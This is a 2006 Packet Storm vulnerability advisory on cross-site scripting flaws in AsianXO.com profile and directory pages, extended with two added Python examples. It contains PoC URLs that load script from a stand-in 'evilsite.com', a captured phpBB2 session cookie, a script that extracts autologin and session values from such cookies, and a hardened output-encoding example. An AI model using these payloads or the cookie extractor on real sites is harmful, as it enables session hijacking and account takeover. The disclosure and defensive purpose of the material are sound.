asianxoXSS.txt

2006-06-12T00:00:00
ID PACKETSTORM:47266
Type packetstorm
Reporter Luny
Modified 2006-06-12T00:00:00

Description

                                        
                                            `AsianXO.com  
  
Homepage:  
http://www.asianxo.com/  
  
Affected files:  
directory.php  
profiles.php  
Input boxes of editing profile  
  
----------------------------  
  
XSS Vulnerability via dir_id:  
  
Directory.php PoC:  
http://www.axo2.com/directory.php?dir_id=1"><SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT><"  
  
Profiles.php PoC using a malformed tag fragment in front of an open-ended iframe (no closing > on the iframe):  
http://www.axo2.com/profiles.php?userid=999999999<""><iframe%20src=http://evilsite.com/scriptlet.html%20<  
  
------------------------------  
  
Another XSS example for profiles.php, this time using the allowed HTML tag <br> in the URL injection along with <script> tags, which also reveals some interesting data:  
  
http://www.axo2.com/profiles.php?userid=99999999<""><BR><BR><BR><BR><BR><BR><SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>  
  
The output text:  
  
This is remote text via xss.js located at evilsite.com phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2210610%22%3B%7D; phpbb2mysql_sid=362562eaac0fc1d69e574584d4f95e60','gallery','height=500,width=700,status=0');">   
  
Percent-decoding the whole string, we notice an autologinid along with our cookie data, which contains our MD5'd password hash:  
  
a:2:{s:11:"autologinid";s:32:"91da4589b012c2fe1ceac1fb2363dbc6";s:6:"userid";s:5:"10610";};  
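The following Python is an added example, not part of the original advisory: it does the decoding described above programmatically. It splits the Cookie fragment reflected in the output into the two phpBB2 cookies, percent-decodes them, and unserializes phpbb2mysql_data, which is a PHP serialize() array. The unserializer covers only the scalar and array types phpBB2 uses; the sample input is the cookie fragment reproduced from the output text above.

```python
from urllib.parse import unquote

# Sample input: the two phpBB2 cookies as they appear in the reflected output above.
SAMPLE_COOKIE = (
    "phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22"
    "91da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2210610%22%3B%7D; "
    "phpbb2mysql_sid=362562eaac0fc1d69e574584d4f95e60"
)


def parse_cookie_header(header):
    """Split 'name=value; name=value' into a dict, percent-decoding each value.

    The serialized data is percent-encoded, so the ';' separators inside it
    appear as %3B and do not collide with the cookie separator.
    """
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if not part or "=" not in part:
            continue
        name, value = part.split("=", 1)
        cookies[name.strip()] = unquote(value.strip())
    return cookies


def php_unserialize(data):
    """Minimal PHP unserialize() for the subset phpBB2 writes into its cookie.

    Handles s: (length-prefixed string), i: (int), b: (bool), N; (null) and
    a: (array, returned as a dict). Raises ValueError on malformed input.
    String lengths are byte lengths in PHP; this assumes ASCII content.
    """
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise ValueError("trailing data after serialized value")
    return value


def _parse(data, pos):
    tag = data[pos]
    if tag == "N":
        if data[pos:pos + 2] != "N;":
            raise ValueError("bad null at %d" % pos)
        return None, pos + 2
    if tag in "ib":
        end = data.index(";", pos)
        num = int(data[pos + 2:end])
        return (bool(num) if tag == "b" else num), end + 1
    if tag == "s":
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                       # skip the ':"' before the bytes
        s = data[start:start + length]
        if data[start + length:start + length + 2] != '";':
            raise ValueError("bad string at %d" % pos)
        return s, start + length + 2
    if tag == "a":
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                         # skip ':{'
        result = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            val, pos = _parse(data, pos)
            result[key] = val
        if data[pos] != "}":
            raise ValueError("unterminated array at %d" % pos)
        return result, pos + 1
    raise ValueError("unsupported type %r at %d" % (tag, pos))


def extract_phpbb2_session(header):
    """Return (autologinid, userid, sid) from a phpBB2 cookie header."""
    cookies = parse_cookie_header(header)
    data = php_unserialize(cookies["phpbb2mysql_data"])
    return data.get("autologinid"), data.get("userid"), cookies.get("phpbb2mysql_sid")


if __name__ == "__main__":
    print(extract_phpbb2_session(SAMPLE_COOKIE))
```

Run as-is it prints the autologinid, userid and session id from the sample above; point extract_phpbb2_session() at any other phpBB2 Cookie header to pull the same three values.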
  
NOTE: You can also use <script>alert(document.cookie)</script> and it will create a popup box with the cookie data in it.  
  
PoC:  
http://www.axo2.com/profiles.php?userid=99999999<""><BR><BR><BR><BR><BR><script>alert(document.cookie)</script>  
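The tail of the reflected output above, ','gallery','height=500,width=700,status=0');">, looks like the end of a window.open() call in an onclick attribute, which means the userid value lands inside a JavaScript string that itself sits inside an HTML attribute. The following Python is an added example, not the site's code: the template it renders is an assumed reconstruction of that markup, used to show the raw interpolation next to the encoding such a double context needs (escape for the JavaScript string first, then for the HTML attribute, because the HTML parser runs before the JS parser).

```python
import html
import json

# Assumed template (a reconstruction, not the site's code): the reflected output ends with
# the tail of a window.open() call, so userid is modelled as landing inside a single-quoted
# JavaScript string inside an onclick attribute.
TEMPLATE = ('<a href="#" onclick="window.open(\'gallery.php?userid=%s\','
            '\'gallery\',\'height=500,width=700,status=0\');">gallery</a>')

# The advisory's second profiles.php PoC, with the URL encoding removed.
PAYLOAD = '99999999<""><BR><BR><BR><BR><BR><script>alert(document.cookie)</script>'


def render_vulnerable(userid):
    """Interpolates the raw parameter, as the observed output suggests the site does."""
    return TEMPLATE % userid


def encode_js_string_in_attr(value):
    """Encode for the innermost context first, then the outer one.

    1. json.dumps escapes backslashes, double quotes and control characters; the
       ' < > & characters are then escaped as \\uXXXX so the value can neither close
       a single-quoted JS string nor inject markup if the handler is ever moved into
       an inline <script> block.
    2. html.escape handles the attribute context; it leaves the backslash sequences
       untouched, so the browser hands the JS parser exactly the escaped string.
    """
    js = json.dumps(str(value))[1:-1]          # drop the surrounding double quotes
    for ch, esc in (("'", "\\u0027"), ("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        js = js.replace(ch, esc)
    return html.escape(js, quote=True)


def render_hardened(userid):
    return TEMPLATE % encode_js_string_in_attr(userid)


def attribute_value(rendered):
    """The onclick value as the HTML parser would delimit it."""
    return rendered.split('onclick="', 1)[1].split('">', 1)[0]


def breaks_out(rendered):
    """True if a raw '<' or '"' survives inside the onclick value, i.e. the payload can
    close the attribute or open a new tag (the JS-string level is covered by the
    \\u0027 escaping in encode_js_string_in_attr)."""
    attr = attribute_value(rendered)
    return "<" in attr or '"' in attr


if __name__ == "__main__":
    print("vulnerable breaks out:", breaks_out(render_vulnerable(PAYLOAD)))
    print("hardened breaks out:  ", breaks_out(render_hardened(PAYLOAD)))
    print(render_hardened(PAYLOAD))
```

Note that html.escape alone would not be enough here: it turns a single quote into &#x27;, which the browser decodes back to ' before the JS parser sees it, so a ' in the input would still terminate the string. That is why the JS-level \u0027 escaping is applied first.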
  
---------------------  
  
XSS Vulnerability of input boxes when editing profile:  
  
The location input box doesn't correctly filter all data; as an XSS example we can enter a double < with ' and no closing >:  
  
<'<IMG SRC=javascript:alert("XSS")  